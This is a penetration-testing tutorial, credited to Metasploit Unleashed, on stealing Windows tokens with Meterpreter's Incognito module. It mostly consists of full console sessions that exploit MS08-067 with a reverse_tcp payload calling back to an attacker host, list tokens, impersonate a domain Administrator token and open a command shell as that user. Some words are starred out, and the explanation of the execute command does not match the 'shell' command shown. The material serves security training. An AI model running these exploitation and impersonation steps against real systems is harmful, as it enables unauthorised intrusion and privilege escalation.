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Incognito Incognito was originally a stand-alone application that allowed you to impersonate user tokens when successfully compromising a system. This was integrated into Metasploit and ultimately into Meterpreter. You can read more about Incognito and how token stealing works via Luke Jennings orignial paper on the subject here: http://labs.mwrinfosecurity.com/publ...2008-04-14.pdf In a nut shell, tokens are just like web ******s. They are a temporary key that allows you to access the system and network without having to provide credentials each time you access a file. Incognito exploits this the same way ****** stealing works, by replaying that temporary key when asked to authenticate. There are two types of tokens, delegate, and impersonate. Delegate are created for 'interactive' logons, such as logging into the machine, or connecting to it via remote desktop. Impersonate tokens are for 'non-interactive' sessions, such as attaching a network drive, or a domain logon script. The other great things about tokens? They persist until a reboot. When a user logs off, their delegate token is reported as a impersonate token, but will still hold all of the rights of a delegate token.
First let's load up our favorite exploit, ms08_067_netapi, with a Meterpreter payload. Note that we manually set the target because this particular exploit does not always auto-detect the target properly. Setting it to a known target will ensure the right memory addresses are used for exploitation. msf > use windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 10.211.55.140 RHOST => 10.211.55.140 msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(ms08_067_netapi) > set LHOST 10.211.55.162 LHOST => 10.211.55.162 msf exploit(ms08_067_netapi) > set LANG english LANG => english msf exploit(ms08_067_netapi) > show targets Exploit targets: Id Name -- ---- 0 Automatic Targeting 1 Windows 2000 Universal 2 Windows XP SP0/SP1 Universal 3 Windows XP SP2 English (NX) 4 Windows XP SP3 English (NX) 5 Windows 2003 SP0 Universal 6 Windows 2003 SP1 English (NO NX) 7 Windows 2003 SP1 English (NX) 8 Windows 2003 SP2 English (NO NX) 9 Windows 2003 SP2 English (NX) 10 Windows XP SP2 Arabic (NX) 11 Windows XP SP2 Chinese - Traditional / Taiwan (NX) msf exploit(ms08_067_netapi) > set TARGET 8 target => 8 msf exploit(ms08_067_netapi) > exploit [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Triggering the vulnerability... [*] Transmitting intermediate stager for over-sized stage...(191 bytes) [*] Sending stage (2650 bytes) [*] Sleeping before handling stage... [*] Uploading DLL (75787 bytes)... [*] Upload completed. [*] Meterpreter session 1 opened (10.211.55.162:4444 -> 10.211.55.140:1028) meterpreter > We now have a Meterpreter console from which we will begin our incognito token attack. Like priv (hashdump and timestomp) and stdapi (upload, download, etc), incognito is a meterpreter module. We load the module into our meterpreter session by executing the 'use incognito' command. Issuing the 'help' command shows us the variety of options we have for incognito and brief descriptions of each option. meterpreter > use incognito Loading extension incognito...success. meterpreter > help Incognito Commands ================== Command Description ------- ----------- add_group_user Attempt to add a user to a global group with all tokens add_localgroup_user Attempt to add a user to a local group with all tokens add_user Attempt to add a user with all tokens impersonate_token Impersonate specified token list_tokens List tokens available under current user context snarf_hashes Snarf challenge/response hashes for every token meterpreter > What we will need to do first is identify if there are any valid tokens on this system. Depending on the level of access that your exploit provides you are limited in the tokens you are able to view. When it comes to token stealing, SYSTEM is king. As SYSTEM you are allowed to see and use any token on the box.
meterpreter > list_tokens -u Delegation Tokens Available ======================================== NT AUTHORITY\LOCAL SERVICE NT AUTHORITY\NETWORK SERVICE NT AUTHORITY\SYSTEM SNEAKS.IN\Administrator Impersonation Tokens Available ======================================== NT AUTHORITY\ANONYMOUS LOGON meterpreter > We see here that there is a valid Administrator token that looks to be of interest. We now need to impersonate this token in order to assume its privileges. When issuing the 'impersonate_token' command, note the two backslashes in "SNEAKS.IN\\ Administrator". This is required as it causes bugs with just one slash. Note also that after successfully impersonating a token, we check our current userID by executing the 'getuid' command. meterpreter > impersonate_token SNEAKS.IN\\Administrator [+] Delegation token available [+] Successfully impersonated user SNEAKS.IN\Administrator meterpreter > getuid Server username: SNEAKS.IN\Administrator meterpreter > Next, lets run a shell as this individual account by running 'execute -f cmd.exe -i -t' from within Meterpreter. The execute -f cmd.exe is telling Metasploit to execute cmd.exe, the -i allows us to interact with the victims PC, and the -t assumes the role we just impersonated through incognito. meterpreter > shell Process 2804 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> whoami whoami SNEAKS.IN\administrator C:\WINDOWS\system32> The result: Success! note :From Metasploit Unleashed - Mastering The Framework |
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